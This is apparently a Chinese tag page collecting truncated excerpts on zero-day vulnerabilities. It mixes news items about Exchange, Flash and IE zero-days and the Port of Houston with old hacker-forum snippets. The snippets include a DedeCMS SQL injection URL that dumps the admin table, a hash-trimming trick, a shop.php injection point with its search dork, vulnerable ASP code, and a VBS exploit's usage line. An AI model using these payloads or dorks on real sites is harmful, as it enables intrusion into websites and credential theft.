标签： 0-day

微软周五披露，2022年8月，一个活动组实现了初始访问，并通过将两个新披露的零日漏洞链接在一组针对全球不到10个组织的有限攻击中，从而破坏了Exchange服务器。 “这些攻击安装了Chopper网络外壳，以促进动手键盘访问，攻击者用它来执行Active Directory侦察和数据泄露，”微软威胁情报中心（MSTIC）在一项新的分析中说。 微软进一步警告说，预计这些漏洞的武器化将在未来几天内增加...

据美国主要港口之一的休斯顿港透露，该港在8月份遭遇了一次据称由民族国家行为者策划的网络攻击，但其系统没有受到影响。 港口官员在9月23日发表的一份声明写道，“休斯顿港务局(休斯顿港)在8 月份成功抵御了网络安全攻击。休斯顿港按照《海上运输安全法》(MTSA) 的指导，遵循其设施安全计划，因此没有任何运营数据或系统受到影响。” 网络安全和基础设施安全局局长 Jen Easterly 在23日上午的参...

此次Hackingteam泄露的数据影响巨大，先后爆出3个Flash0day，1个Font提权0day，昨天在twitter上又有人公布了一个新的windows权限提升0day，阿里安全研究人员又从邮件中发现一处针对IE11 的0day，0day频繁爆出，各位请关好门窗,防火防盗!

黑客通过分析最近意大利监控软件厂商泄漏的文件，发现Adobe Flash播放器存在第2个零日漏洞，同时他们还发现了Windows中的一个零日漏洞。

上周，微软证实了IE10曝出一个“0-day漏洞”的消息，并且该漏洞已经被用于至少一起逍遥在外的攻击中。今天，该公司再发安全警告，证实了相关漏洞也被用于针对IE9的攻击中。

对于APT攻击，企业很难做到阻止，应对这种攻击通常需要明确的响应和恢复计划，这样做的目的是减少损害和损失。因为一旦发现APT活动，这通常意味着已经为时已晚。

2012年6月4日，互联网安全公司知道创宇安全研究团队发现易通企业网站系统(CmsEasy)存在严重越权0day漏洞，该漏洞在易通4.6~5.0版本中普遍存在，通过该漏洞，攻击者可以非常轻易获取网站管理员权限，从而控制整个网站，危害巨大。 发现漏洞后，知道创宇安全研究团队第一时间与易通软件官方取得了联系，在随后的积极沟通中，易通软件确认了该漏洞的存在。 6月5日易通官方发布了安全补丁，维护了广大易...

　　plus/advancedsearch.php
　　$sql 变量未初始化。导致鸡助注入。

漏洞利用：

　　plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
　　dede 的密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5。

　　KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统，前台全部静态化处理，新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力，现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点，特别是针对比较懒的站长。
　　漏洞算不上0day，但是却具有0day的危害效果，主要是因管理为对后台路径和编辑器路径做更改，系统是使用FCKeditor编辑器，这个编辑器的漏洞大家都比较熟悉了，下面就给出具体利用方法。
　　利用前提：管理员未更改后台路径以及FCKeditor编辑器路径做更改。
...

从zhenker的百度空间转转过来的，游侠刚测试了下，可以用！OK , Let's Go !

UCenter Home 2.0 shop插件漏洞都叫做DZ 0DYAY了。真杯具。

注入页: shop.php
注入字段: (?)ac=view&shopid=
关键词: inurl:shop.php?ac=view&shopid=

　　上午的时候在群（53651293）里面听到有哥们说Discuz 7.1和7.2出0day了，下午就得到了证实……
　　www.cnciso.com/bbs就被群里面的哥们拿来做了测试……给写了个tool.php进去，然后发了个密码给我……
　　去Discuz官方发了几个帖子，依此被转移到了内部讨论区……我也没权限了。
　　这次问题比较严重，查到的说是msic.php有注入问题，另一个文件可以跨站，另据传，有个可以直接拿到shell的漏洞……详情不知，探索中……
　　下面是在Windows服务器下面的解决方法，很简单：forumdata/cache的脚本执行权限去掉就OK，另外据传：DedeCMS的cache目录也要如此设置……多余的话不说了 嘿嘿。

　　设置完后，cache下面的shell执行的时候提示如下：

　　传闻：落伍者、站长网已经被搞，游侠亲眼看到了后者的shell图，确切的说是一句话……静待官方的补丁出来吧。

用法：Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

我的电脑上没有安装php，就编写了一个Vbs版漏洞利用工具。

影响版本：3.0
信息来源：零客网安 www.0kee.com
Author：bink
漏洞文件：action.asp

很SB的洞。
第14行
Copy codestrcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

这个贱B下午就跑人官方去捣乱了。

强奸出的密码是sha1，突死有彩虹表的人继续强奸吧
直接吊hashkey可以进前台操蛋
...

　　据了解，该漏洞存在于微软IE7浏览器中，如果用户没有及时修补该漏洞，当用户使用存在漏洞的IE7浏览器浏览网页时，一旦打开了被黑客恶意挂马的网页时，病毒就会利用该漏洞入侵到用户计算机中，给用户带来严重的损失。

　　据江民反病毒专家介绍，目前微软MS09-002漏洞还没有被大量用于网页挂马，但随着攻击代码被完全公布在互联网上，预计在未来的几天内就会被国内的黑客大面积利用，用于广泛的传播各种恶